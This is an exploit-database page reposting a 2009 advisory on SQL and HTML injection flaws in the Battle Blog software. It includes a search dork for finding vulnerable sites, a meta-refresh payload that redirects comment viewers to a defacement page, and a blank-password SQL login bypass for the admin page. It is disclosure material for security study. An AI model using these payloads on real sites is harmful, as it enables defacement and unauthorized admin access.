header-logo
Suggest Exploit
vendor:
Battle Blog
by:
$qL_DoCt0r
7,5
CVSS
HIGH
SQL/HTML Injection
89, 79
CWE
Product Name: Battle Blog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Battle Blog SQL/HTML Injection Vulnerability

The vulnerability is present in the comment section of the blog. An attacker can inject HTML/XSS code in the comment section and submit it. The code will be executed when the page is loaded. An attacker can also inject SQL code in the username field of the admin page and leave the password field blank to gain access to the admin page.

Mitigation:

Input validation should be done on the comment section and the username field of the admin page.
Source

Exploit-DB raw data:

###################################################################
#        battle blog sql/html injection vulnerability             #
###################################################################

author: $qL_DoCt0r
email: cookiestealer375@gmail.com
msn: sidthesloth@windowslive.com
blog: http://full-discl0sure.blogspot.com

html injection vulnerability

dork:inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.

once on blog...
scroll down to: make new comment

fill in the name: website: e-mail: forms
then type your html/xss as the comment, eg:<meta HTTP-EQUIV="REFRESH" content="0; url=http://yoursite.com/deface.htm">
click preview
then submit
if your doing a redirect you need to click submit fast
NOTE: iframes do not work because the submit button doesn't appear
on some blogs you can use fire bug to make a submit button!


sql injection vulnerability

dork: same as before

just look on the navigation bar to the side and click admin

type your sql as the username
and leave the password field blank.

# milw0rm.com [2009-07-17]

Navigation

Suggest Exploit

Services By CQR